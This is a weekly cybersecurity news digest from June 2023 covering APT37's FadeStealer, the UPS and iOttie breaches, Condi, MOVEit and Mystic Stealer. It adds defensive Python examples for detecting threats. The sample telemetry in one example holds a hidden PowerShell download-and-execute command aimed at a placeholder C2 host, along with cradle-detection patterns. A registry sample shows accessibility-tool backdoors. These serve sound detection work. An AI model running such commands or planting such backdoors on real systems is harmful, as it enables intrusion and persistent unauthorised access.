Thursday, June 22nd, 2023
Cybersecurity Week in Review (23/06/2023)
APT37 Hackers Deploy New FadeStealer Eavesdropping Malware
The North Korean APT37 hacking group uses a new ‘FadeStealer’ information-stealing malware containing a ‘wiretapping’ feature, allowing the threat actor to snoop and record from victims’ microphones.
APT37, also known as ScarCruft, Reaper, or RedEyes, is believed to be a state-sponsored hacking group with a long history of conducting cyber espionage attacks aligned with North Korean interests. Its attacks target North Korean defectors, educational institutions, and EU-based organisations.
In the past, the hackers were known to utilise custom malware called ‘Dolphin’ and ‘M2RAT’ to execute commands and steal data, credentials, and screenshots from Windows devices and even connected mobile phones.
In a new report, researchers provide details of two new custom malware families, dubbed ‘AblyGo backdoor’ and ‘FadeStealer’, that the threat actors use in cyber espionage attacks. The malware is believed to be delivered using phishing emails with attached archives containing password-protected Word and Hangul Word Processor documents (.docx and .hwp files) and a ‘password.chm’ Windows CHM file.
The phishing emails are believed to instruct the recipient to open the CHM file to obtain the password for the documents, which begins the infection process on the Windows device. Once opened, the CHM file displays the purported document password but also quietly downloads and executes a remote PowerShell script that contains backdoor functionality and is registered to autostart with Windows.
This PowerShell backdoor communicates with the attackers’ command and control servers and executes any commands sent by the attackers. The backdoor is used to deploy an additional GoLang backdoor used in the later stages of the attack to conduct privilege escalation, data theft, and the delivery of further malware.
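The chain described above (CHM file opened, PowerShell script downloaded and executed, autostart entry written) leaves a recognisable trail in endpoint process telemetry. The following is an added example written for this digest, not code from the original report or from the malware: it runs a small set of detection rules over constructed events shaped like Sysmon process-creation (EventID 1) and registry-value-set (EventID 13) records. It assumes that .chm files are opened by the Windows HTML Help viewer hh.exe (the page does not name that executable); all paths, PIDs, the SID and the URL are placeholders.

```python
import ntpath
import re

# Constructed sample telemetry in the shape of Sysmon EventID 1 (process creation)
# and EventID 13 (registry value set). Every path, PID, SID and URL is a placeholder.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 412, "ppid": 300, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # hh.exe is the HTML Help viewer that opens .chm files (assumption: not named on the page)
    {"id": 1, "pid": 1804, "ppid": 412, "image": r"C:\Windows\hh.exe",
     "cmdline": r'"C:\Windows\hh.exe" C:\Users\victim\Downloads\password.chm'},
    {"id": 1, "pid": 1920, "ppid": 1804,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://c2.placeholder.invalid/stage')\""},
    {"id": 13, "pid": 1920,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"powershell.exe -w hidden -f C:\Users\victim\AppData\Roaming\update.ps1"},
    # Benign control: an administrator starting PowerShell from Explorer
    {"id": 1, "pid": 2100, "ppid": 412,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe"}
# Substrings typical of a PowerShell download-and-run cradle (lower-cased comparison)
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iex ", "iex(",
                  "invoke-expression", "-enc ", "-encodedcommand", "frombase64string")
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?\\", re.I)


def _name(path):
    return ntpath.basename(path).lower()


def ancestry(events, pid):
    """Image names from the given process up to the root of the recorded tree.
    Only EventID 1 records carry parent PIDs; PID reuse is ignored in this illustration."""
    by_pid = {e["pid"]: e for e in events if e["id"] == 1}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Return (pid, rule, detail) findings for a CHM -> interpreter -> autostart chain."""
    findings = []
    for e in events:
        if e["id"] == 1:
            chain = ancestry(events, e["pid"])  # chain[0] is the process itself
            child = chain[0]
            parent = chain[1] if len(chain) > 1 else ""
            cmd = e["cmdline"].lower()
            if parent == "hh.exe" and child in INTERPRETERS:
                findings.append((e["pid"], "chm_spawned_interpreter", f"{parent} -> {child}"))
            if child in {"powershell.exe", "pwsh.exe"} and any(m in cmd for m in CRADLE_MARKERS):
                findings.append((e["pid"], "powershell_download_cradle", cmd[:80]))
        elif e["id"] == 13 and RUN_KEY_RE.search(e["target"]):
            # Persistence is only interesting here if the writer descends from the CHM viewer
            if "hh.exe" in ancestry(events, e["pid"]):
                findings.append((e["pid"], "autostart_set_from_chm_chain", e["target"]))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Run as a script it prints three findings, all for PID 1920, and nothing for the administrator's interactive PowerShell. In production the same rules would be expressed in the SIEM or EDR query language, with the ancestry walk replacing a plain parent-image match so that an intermediate cmd.exe or conhost.exe does not hide the CHM origin.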
This new backdoor is named ‘AblyGo backdoor,’ as it uses the Ably Platform, an API service that allows developers to deploy real-time features and information delivery in their applications. The threat actors use Ably as a command and control platform to send base64-encoded commands to the backdoor for execution and then to receive the output, which they retrieve later.
As this is a legitimate platform, it is likely used by the threat actors to evade network monitoring and security software. Commands that the attackers used illustrated how they used the backdoor to list the files in a directory, rename a fake .jpg file to an .exe file, and then execute it. However, it is technically possible for the threat actor to send any command they wish to execute.
Ultimately, the backdoors deploy a final payload in the form of ‘FadeStealer,’ an information-stealing malware capable of stealing a wide variety of information from Windows devices. When installed, FadeStealer is injected via DLL sideloading into the legitimate Internet Explorer ‘ieinstall.exe’ process and begins stealing data from the device, storing it in RAR archives every 30 minutes.
The data includes screenshots, logged keystrokes, files collected from connected smartphones, and removable devices. The malware also includes the ability to record audio from a connected microphone, enabling the threat actors to listen in on conversations.
The threat actors can then analyse this collected data to steal sensitive information for use by the North Korean government or conduct further attacks.
APT37 is not the only North Korean threat actor utilising CHM files to deploy malware. It is also reported that the Kimsuky state-sponsored hacking group is utilising CHM files in phishing attacks to deploy malicious scripts that steal user information and install additional malware.
UPS Discloses Data Breach After Exposed Customer Info Used in SMS Phishing
Multinational shipping company UPS is alerting Canadian customers that some of their personal information might have been exposed via its online package look-up tools and abused in phishing attacks.
At first glance, the letters sent by UPS Canada, titled “Fighting phishing and smishing – an update from UPS,” seem to be a warning to customers about the dangers of phishing. However, it turns out that this is actually a data breach notification, with the company sneaking in a disclosure stating that it has been receiving reports of SMS phishing messages containing the recipients’ names and address info.
“UPS is aware that some package recipients have received fraudulent text messages demanding payment before a package can be delivered,” UPS said in a letter.
After receiving the phishing reports, UPS worked with partners within the delivery chain to understand the method used by the threat actors to harvest their targets’ shipping information.
Following an internal review, UPS found that the attackers behind this ongoing SMS phishing campaign were using its package look-up tools to access delivery details, including the recipients’ personal contact information, between February 2022 and April 2023.
The company has now implemented measures designed to restrict access to this sensitive data to thwart these convincing phishing attempts. UPS says it’s notifying individuals whose information may have been affected to ensure transparency and awareness of the situation.
“The information available through the package look-up tools included the recipient’s name, shipment address, and potentially phone number and order number,” UPS said.
“We cannot provide you with the exact time frame that the misuse of our package look-up tools occurred. It may have affected packages for a small group of shippers and some of their customers from February 1, 2022 to April 24, 2023.”
UPS customers worldwide have been affected by these phishing attacks, as shown by online reports of the threat actors using their names, phone numbers, and postal codes, as well as info on recent orders. According to numerous malicious texts, the threat actors are impersonating LEGO and Apple shipments, with other companies likely also impacted.
In September and July, the Internal Revenue Service (IRS) and the Federal Communications Commission (FCC) warned Americans of a massive rise in SMS phishing attacks.
iOttie discloses data breach after site hacked to steal credit cards
Car mount and mobile accessory maker iOttie warns that its site was compromised for almost two months to steal online shoppers’ credit cards and personal information. iOttie is a popular manufacturer of mobile device car mounts, chargers, and accessories.
In a new data breach notification issued yesterday, iOttie says it discovered on June 13th that its online store had been compromised with malicious scripts between April 12th, 2023, and June 2nd.
“We believe criminal e-skimming occurred from April 12, 2023, through June 2, 2023. However, on June 2, 2023, during a WordPress/plugin update, the malicious code was removed,” warns the iOttie data breach notification.
“Nevertheless, they could have obtained your credit card information to purchase our client’s product online at www.iOttie.com.”
iOttie has not shared how many customers were impacted but said that names, personal information, and payment information could have been stolen, including financial account numbers, credit and debit card numbers, security codes, access codes, passwords, and PINs.
Due to the detailed information potentially exposed in this attack, all iOttie customers who purchased a product between April 12th and June 2nd should monitor their credit card statements and bank accounts for fraudulent activity.
While iOttie has not shared how they were breached, their online store is a WordPress site with the WooCommerce merchant plugin. WordPress is one of the most commonly targeted website platforms by threat actors, with vulnerabilities often found in plugins that allow complete takeovers of sites or malicious code injection into WordPress templates.
As iOttie disclosed that the malicious code was removed with a plugin update, the hackers likely breached the site using a vulnerability in one of its WordPress plugins. Recently, threat actors have been exploiting vulnerabilities in various WordPress plugins, including cookie consent banners, Advanced Custom Fields, and Elementor Pro.
New ‘RDStealer’ Malware Targets RDP Connections
A state-sponsored espionage campaign is leveraging new custom malware to monitor incoming remote desktop protocol (RDP) connections and infect connecting clients with a backdoor. The campaign has been operational since the beginning of 2022 and appears aligned with the interests of China-based threat actors.
Bearing the hallmarks of a state-sponsored group, the espionage campaign stands out with two custom tools written in the Go programming language: the Logutil backdoor and the RDStealer malware. The threat actor behind these attacks has been active since at least 2020, initially relying on off-the-shelf malware such as AsyncRAT and Cobalt Strike. In late 2021, the APT actor shifted to custom malware like RDStealer, which can capture clipboard contents, log keystrokes, and harvest data from the infected machines.
What makes RDStealer special, however, is the capability to monitor incoming RDP connections and infect the connecting clients that have client drive mapping (CDM) enabled.
CDM is a virtual channel that allows data transfers between RDP servers and clients by exposing the local drives of the client machine during the remote desktop session. CDM is typically enabled on clients, with the configuration managed on the server side.
On an infected machine, RDStealer continuously monitors for RDP connections with CDM enabled and, if one is detected, it notifies the command-and-control (C&C) server, starts exfiltrating data from the connecting client, and deploys the Logutil backdoor on it.
The backdoor leverages multiple DLL sideloading techniques to evade detection, including by abusing the Windows Management Instrumentation service (Winmgmt).
On an infected system, Logutil establishes persistence, communicates with the C&C directly or through a proxy server on the same network, and executes commands retrieved from the C&C: loading DLLs, running commands, downloading/uploading files, and listing folders.
Over 100,000 Stolen ChatGPT Account Credentials Sold on Dark Web Marketplaces
Over 100,000 compromised OpenAI ChatGPT account credentials found their way onto illicit dark web marketplaces between June 2022 and May 2023, with India alone accounting for 12,632 stolen credentials. The credentials were discovered within information stealer logs made available for sale on the cybercrime underground.
The number of available logs containing compromised ChatGPT accounts reached a peak of 26,802 in May 2023. The Asia-Pacific region has experienced the highest concentration of ChatGPT credentials being offered for sale over the past year.
Other countries with the highest numbers of compromised ChatGPT credentials include Pakistan, Brazil, Vietnam, Egypt, the U.S., France, Morocco, Indonesia, and Bangladesh.
A further analysis has revealed that the majority of logs containing ChatGPT accounts have been breached by the notorious Raccoon info stealer (78,348), followed by Vidar (12,984) and RedLine (6,773).
Information stealers have become popular among cybercriminals for their ability to hijack passwords, cookies, credit cards, and other information from browsers and cryptocurrency wallet extensions. Typically offered under a subscription-based pricing model, they have not only lowered the bar for cybercrime but also serve as a conduit for launching follow-on attacks using the siphoned credentials.
To mitigate such risks, it’s recommended that users follow appropriate password hygiene practices and secure their accounts with two-factor authentication (2FA) to prevent account takeover attacks.
The development comes amid an ongoing malware campaign that’s leveraging fake OnlyFans pages and adult content lures to deliver a remote access trojan and an information stealer called DCRat (or DarkCrystal RAT), a modified version of AsyncRAT.
New Condi Malware Builds DDoS Botnet out of TP-Link AX21 Routers
A new DDoS-as-a-Service botnet called “Condi” emerged in May 2023, exploiting a vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to build an army of bots to conduct attacks.
AX1800 is a popular Linux-based dual-band (2.4GHz + 5GHz) Wi-Fi 6 router with 1.8 Gbps bandwidth, used primarily by home users, small offices, shops, cafes, etc.
Condi aims to enlist new devices to create a powerful DDoS (distributed denial of service) botnet that can be rented to launch attacks on websites and services. Moreover, the threat actors behind Condi sell the malware’s source code, which is an unusually aggressive monetisation method destined to result in numerous project forks with different features.
A new report published this week explains that Condi targets CVE-2023-1389, a high-severity unauthenticated command injection and remote code execution flaw in the API of the router’s web management interface. The flaw was discovered and reported to the network equipment vendor in January 2023, with TP-Link releasing a security update in March with version 1.1.4 Build 20230219.
Condi is the second DDoS botnet to target this vulnerability after Mirai previously exploited it at the end of April. To deal with the attack overlaps, Condi has a mechanism that attempts to kill any processes belonging to known competitor botnets. At the same time, it also stops older versions of itself.
Because Condi doesn’t have a persistence mechanism to survive between device reboots, its authors decided to equip it with a wiper for certain files, which prevents the devices from being shut down or restarted.
For propagation to vulnerable TP-Link routers, the malware scans for public IPs with open ports 80 or 8080 and sends a hardcoded exploitation request to download and execute a remote shell script that infects the new device.
Some samples that were analysed contained a scanner for CVE-2023-1389, but others used different flaws to propagate, so its authors or operators could be experimenting on that front. Additionally, analysts found samples that use a shell script with an ADB (Android Debug Bridge) source, potentially indicating that the botnet is spread through devices with an open ADB port (TCP/5555).
Presumably, this is the direct result of multiple threat actors having bought Condi’s source code, adjusting its attacks as they see fit.
Regarding Condi’s DDoS attack capabilities, the malware supports various TCP and UDP flood methods similar to those of Mirai. Older samples also contain HTTP attack methods; however, these appear to have been stripped in the latest malware version.
Owners of the Archer AX21 AX1800 dual-band Wi-Fi 6 router can get the latest firmware update for their device’s hardware version from TP-Link’s downloads centre. Signs of an infected TP-Link router include device overheating, network disruptions, inexplicable changes in a device’s network settings, and admin user password resets.
Medibank’s Employee Data Leaked in MOVEit Attacks
Medibank, Australia’s largest private health insurer, said that details of the company’s employees were exposed after its property manager fell victim to an attack exploiting the MOVEit flaw.
According to Medibank, one of its property managers, which uses the file transfer software MOVEit, was compromised. A file containing the insurer’s employee names, email addresses, and phone numbers was stolen, Reuters reported.
Medibank said that its systems “have not been impacted by the MOVEit cyberattack,” adding that the exposed file did not have employee bank details, payroll, or home addresses.
“We continue to investigate and work closely with the vendor, and at this stage we are not aware of any of our customers’ data being compromised,” Medibank said.
The staff detail leak comes at a sensitive time for Medibank, as the company is still sifting through the fallout from a previous attack in October 2022. In that incident, hackers stole the sensitive data of around 9.7 million current and former customers.
Medibank is currently facing three class action lawsuits in relation to the breach, and is also under investigation by the country’s privacy regulator regarding its handling of personal information.
Medibank was not the only organisation to disclose that it was a victim of the MOVEit attacks. Gen Digital (NASDAQ: GEN), the company behind known cybersecurity brands such as Avast, Avira, AVG, Norton, and LifeLock, also confirmed that employees’ personal information was compromised in the recent attack.
Other known victims of the MOVEit zero-day attacks include the U.S. Department of Energy, Louisiana’s Office of Motor Vehicles, Oregon’s Department of Transportation, the Nova Scotia government, British Airways, the British Broadcasting Corporation, Aer Lingus, U.K. drugstore chain Boots, the University of Rochester, the Illinois Department of Innovation & Technology (DoIT), and the Minnesota Department of Education (MDE).
State-Backed Hackers Employ Advanced Methods to Target Middle Eastern and African Governments
Governmental entities in the Middle East and Africa have been at the receiving end of sustained cyber-espionage attacks that leverage never-before-seen and rare credential theft and Exchange email exfiltration techniques. The main goal of the attacks was to obtain highly confidential and sensitive information, specifically related to politicians, military activities, and ministries of foreign affairs.
The threat activity is being tracked under the temporary name CL-STA-0043 (where CL stands for cluster and STA stands for state-backed motivation), described as a true advanced persistent threat.
The infection chain is triggered by the exploitation of vulnerable on-premises Internet Information Services (IIS) and Microsoft Exchange servers to infiltrate target networks. Failed attempts to execute the China Chopper web shell were detected in one of the attacks, prompting the adversary to shift tactics and leverage an in-memory Visual Basic Script implant from the Exchange Server.
A successful break-in is followed by reconnaissance activity to map out the network and single out critical servers that hold data of value, including domain controllers, web servers, Exchange servers, FTP servers, and SQL databases.
CL-STA-0043 has also been observed leveraging native Windows tools for privilege escalation, thereby enabling it to create admin accounts and run other programs with elevated privileges.
Another privilege escalation method entails the abuse of accessibility features in Windows – i.e., the “sticky keys” utility (sethc.exe) – that makes it possible to bypass login requirements and backdoor the systems. A similar approach employing the Utility Manager (utilman.exe) to establish persistent backdoor access to a victim’s environment was documented earlier this April.
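The accessibility-feature backdoor mentioned above is commonly implemented by registering a debugger for sethc.exe or utilman.exe under the Image File Execution Options (IFEO) key, so that Windows launches the registered program instead of the accessibility tool at the logon screen. The following is an added example for this digest, not code from the original report: it parses a registry export and flags any accessibility binary with a Debugger value set. It assumes the input is the text produced by `reg export` of the IFEO key; the export excerpt and every path in it are constructed for the example.

```python
import re

# Constructed excerpt in the format produced by
#   reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg
# The entries are illustrative; none of them comes from the page.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions]
"mscorwks.dll"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe]
"Debugger"="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\devenv.exe]
"Debugger"="C:\\Tools\\vsjitdebugger.exe"
'''

# Binaries reachable from the logon screen; a Debugger value on any of them is a red flag.
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                          "magnify.exe", "displayswitch.exe", "atbroker.exe"}
IFEO_RE = re.compile(
    r"^HKEY_LOCAL_MACHINE\\SOFTWARE\\(?:WOW6432Node\\)?Microsoft\\Windows NT\\CurrentVersion"
    r"\\Image File Execution Options\\([^\\]+)$", re.I)
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def _unescape(s):
    # .reg string syntax escapes backslashes and double quotes with a backslash
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text):
    """Parse the subset of the .reg format needed here: [key] headers and "name"="string" values.
    Non-string values (dword:, hex:) are kept as their raw text."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m is None or current is None:
            continue  # continuation lines of multi-line hex: values are not needed here
        name = "(Default)" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
        value = m.group(2)
        if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
            value = _unescape(value[1:-1])
        keys[current][name] = value
    return keys


def find_accessibility_hijacks(keys):
    """Return (binary, debugger) pairs for accessibility tools that have an IFEO Debugger set."""
    hits = []
    for key, values in keys.items():
        m = IFEO_RE.match(key)
        if not m:
            continue
        exe = m.group(1).lower()
        debugger = next((v for k, v in values.items() if k.lower() == "debugger"), None)
        if exe in ACCESSIBILITY_BINARIES and debugger:
            hits.append((exe, debugger))
    return hits


if __name__ == "__main__":
    for exe, dbg in find_accessibility_hijacks(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f"{exe}: Debugger = {dbg}")
```

The devenv.exe entry is left alone because IFEO debuggers are a legitimate developer feature; the check is specific to binaries that Windows will run before anyone has authenticated. The other variant of the same backdoor, overwriting sethc.exe itself with a copy of cmd.exe, is not visible in the registry and is caught instead by comparing the file hash of each accessibility binary against the hash of cmd.exe or against the Windows component store.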
Besides using Mimikatz for credential theft, the threat actor’s modus operandi stands out for utilising other novel methods to steal passwords, conduct lateral movement, and exfiltrate sensitive data, such as:
- Using network providers to execute a malicious DLL to harvest and export plaintext passwords to a remote server
- Leveraging an open-source penetration testing toolset called Yasso to spread across the network, and
- Taking advantage of the Exchange Management Shell and PowerShell snap-ins to harvest emails of interest
It’s worth pointing out that the use of Exchange PowerShell snap-ins to export mailbox data has been previously reported in the case of a Chinese state-sponsored group referred to as Silk Typhoon (formerly Hafnium), which first came to light in March 2021 in connection with the exploitation of Microsoft Exchange Server.
Microsoft Blames Massive DDoS Attack for Azure, Outlook, and OneDrive Disruptions
Microsoft on Friday attributed a string of service outages aimed at Azure, Outlook, and OneDrive earlier this month to an uncategorised cluster it tracks under the name Storm-1359.
“These attacks likely rely on access to multiple virtual private servers (VPS) in conjunction with rented cloud infrastructure, open proxies, and DDoS tools,” the tech giant said in a post on Friday.
Storm-#### (previously DEV-####) is a temporary designation the Windows maker assigns to unknown, emerging, or developing groups whose identity or affiliation hasn’t been definitively established yet.
While there is no evidence that any customer data was accessed or compromised, the company noted the attacks “temporarily impacted availability” of some services. The threat actor was further observed launching layer 7 DDoS attacks from multiple cloud services and open proxy infrastructures.
This includes HTTP(S) flood attacks, which bombard the target services with a high volume of HTTP(S) requests; cache bypass, in which the attacker attempts to bypass the CDN layer and overload the origin servers; and a technique known as Slowloris.
“This attack is where the client opens a connection to a web server, requests a resource (e.g., an image), and then fails to acknowledge the download (or accepts it slowly),” the Microsoft Security Response Center (MSRC) said. “This forces the web server to keep the connection open and the requested resource in memory.”
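The Slowloris technique quoted above works only if the server is willing to wait indefinitely for a client to finish its request. The standard defence is a wall-clock deadline for completing the request headers, which is what `client_header_timeout` in nginx or mod_reqtimeout in Apache enforce. The following is an added example written for this digest, not code from Microsoft or from the original report: it implements that deadline for a raw socket in Python and exercises it against a simulated well-behaved client and a simulated slow client over a local socket pair. The timing values and the request text are constructed for the demonstration.

```python
import socket
import threading
import time

HEADER_DEADLINE_S = 0.5   # wall-clock budget for a client to finish its request headers (constructed value)
MAX_HEADER_BYTES = 8192   # size cap, so trickled headers cannot grow without bound inside the deadline


def read_request_headers(conn, deadline_s=HEADER_DEADLINE_S, max_bytes=MAX_HEADER_BYTES):
    """Read until the blank line that ends the HTTP header block.
    The deadline covers the whole header block, not just each recv(), so a client
    that sends one header line at a time cannot keep the connection open indefinitely."""
    buf = b""
    deadline = time.monotonic() + deadline_s
    while b"\r\n\r\n" not in buf:
        remaining = deadline - time.monotonic()
        if remaining <= 0:
            raise TimeoutError("request headers not completed within deadline")
        conn.settimeout(remaining)
        try:
            chunk = conn.recv(4096)
        except socket.timeout:
            raise TimeoutError("request headers not completed within deadline")
        if not chunk:
            raise ConnectionError("client closed the connection before finishing headers")
        buf += chunk
        if len(buf) > max_bytes:
            raise ValueError("request header block exceeds limit")
    head, _, body_start = buf.partition(b"\r\n\r\n")
    return head.decode("latin-1"), body_start


def serve_one(behaviour, deadline_s=HEADER_DEADLINE_S):
    """Drive read_request_headers against a simulated client over a socketpair.
    "normal" sends a complete request at once; "slowloris" sends one header
    fragment per interval and never the terminating blank line.
    Returns "served" or "timeout"."""
    server_sock, client_sock = socket.socketpair()

    def client():
        try:
            if behaviour == "normal":
                client_sock.sendall(b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n")
            else:
                client_sock.sendall(b"GET / HTTP/1.1\r\nHost: example.test\r\n")
                for i in range(100):
                    time.sleep(deadline_s / 5)
                    client_sock.sendall(f"X-Keepalive-{i}: 1\r\n".encode())
        except OSError:
            pass  # the server closed its end: the slow client has been cut off
        finally:
            client_sock.close()

    t = threading.Thread(target=client, daemon=True)
    t.start()
    try:
        read_request_headers(server_sock, deadline_s)
        result = "served"
    except TimeoutError:
        result = "timeout"
    finally:
        server_sock.close()   # releases the connection slot the slow client was holding
    t.join(timeout=5)
    return result


if __name__ == "__main__":
    print("normal client:   ", serve_one("normal"))
    print("slowloris client:", serve_one("slowloris"))
```

The deadline alone does not stop a distributed attacker from opening many connections at once, which is why production deployments combine it with per-source connection limits and a CDN or load balancer that absorbs incomplete requests before they reach the origin.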
Microsoft 365 services such as Outlook, Teams, SharePoint Online, and OneDrive for Business went down at the start of the month, with the company subsequently stating it had detected an “anomaly with increased request rates.”
“Traffic analysis showed an anomalous spike in HTTP requests being issued against Azure portal origins, bypassing existing automatic preventive measures, and triggering the service unavailable response,” it said.
Microsoft further characterised the actors as focused on disruption and publicity. A hacktivist group known as Anonymous Sudan has claimed responsibility for the attacks. However, it’s worth noting that the company has not explicitly linked Storm-1359 to Anonymous Sudan.
Anonymous Sudan has been making waves in the threat landscape with a series of DDoS attacks against Swedish, Dutch, Australian, and German organisations since the start of the year. Analysis in late March 2023 indicated that the adversary is likely an offshoot of the Pro-Russian threat actor group KillNet that first gained notoriety during the Russian-Ukraine conflict last year.
KillNet has also attracted attention for its DDoS attacks on healthcare entities hosted in Microsoft Azure, which have surged from 10-20 attacks in November 2022 to 40-60 attacks daily in February 2023.
The Kremlin-affiliated collective, which first emerged in October 2021, has further established a “private military hacking company” named Black Skills in an attempt to lend its cyber mercenary activities a corporate sheen.
Anonymous Sudan’s Russian connections have also become evident in the wake of its collaboration with KillNet and REvil to form a “DARKNET parliament” and orchestrate cyber attacks on European and U.S. financial institutions. “Task number one is to paralyse the work of SWIFT,” a message posted on June 14, 2023, read.
New Mystic Stealer Malware Increasingly Used in Attacks
A new information-stealing malware named ‘Mystic Stealer’ has been promoted on hacking forums and darknet markets since April 2023, quickly gaining traction in the cybercrime community.
The malware, rented for $150/month, targets 40 web browsers, 70 browser extensions, 21 cryptocurrency applications, 9 MFA and password management applications, 55 cryptocurrency browser extensions, Steam and Telegram credentials, and more.
Reports on Mystic Stealer warn about the emergence of the new malware, its sophistication, and what appears to be a surge in sales that brings many new campaigns online.
Mystic Stealer debuted version 1.0 in late April 2023 but quickly ramped up to version 1.2 towards the end of May, indicating an active development for the project. The seller advertised the new malware on multiple hacking forums, including the WWH-Club, BHF, and XSS, renting it to interested individuals for the competitive subscription price of $150 per month or $390 per quarter.
The project also operates a Telegram channel (Mystic Stealer News) where development news, feature requests, and other relevant topics are discussed. It is reported that the creator of the new malware accepts feedback from established members of the underground hacking community and openly invites them to share suggestions for improving Mystic.
Mystic Stealer can target all Windows versions from XP to 11, supporting 32- and 64-bit OS architectures. The malware does not need any dependencies, so its footprint on infected systems is minimal, and it operates in memory to avoid detection by anti-virus products.
Moreover, Mystic performs several anti-virtualisation checks, like inspecting the CPUID details to ensure it is not executed in sandboxed environments. Mystic’s author has added an exclusion for Commonwealth of Independent States (CIS) countries (formerly the Soviet Union), which could indicate the new malware’s origin.
Another restriction set by the creator prevents builds older than a specified date from running, possibly to minimise the malware’s exposure to security researchers. Starting May 20, 2023, the malware’s author added a loader functionality allowing Mystic to fetch additional payloads from the C2 server.
All communication with the C2 is encrypted using a custom binary protocol over TCP, while all stolen data is sent directly to the server without first storing it on the disk. This is an unusual approach for info-stealer malware but helps Mystic evade detection.
The operator can configure up to four C2 endpoints for resiliency, which are encrypted using a modified XTEA-based algorithm. Upon first execution, Mystic gathers OS and hardware information and snaps a screenshot, sending the data to the attacker’s C2 server. Depending on the instructions it receives, the malware will target more specific data stored in web browsers, applications, etc.
Although the future of Mystic Stealer is still in debate, considering the volatile nature of illegal MaaS projects, its emergence signals elevated risk for users and organisations. The recent addition of a loader could help Mystic operators drop payloads such as ransomware onto compromised computers, so extreme caution is advised when downloading software from the internet.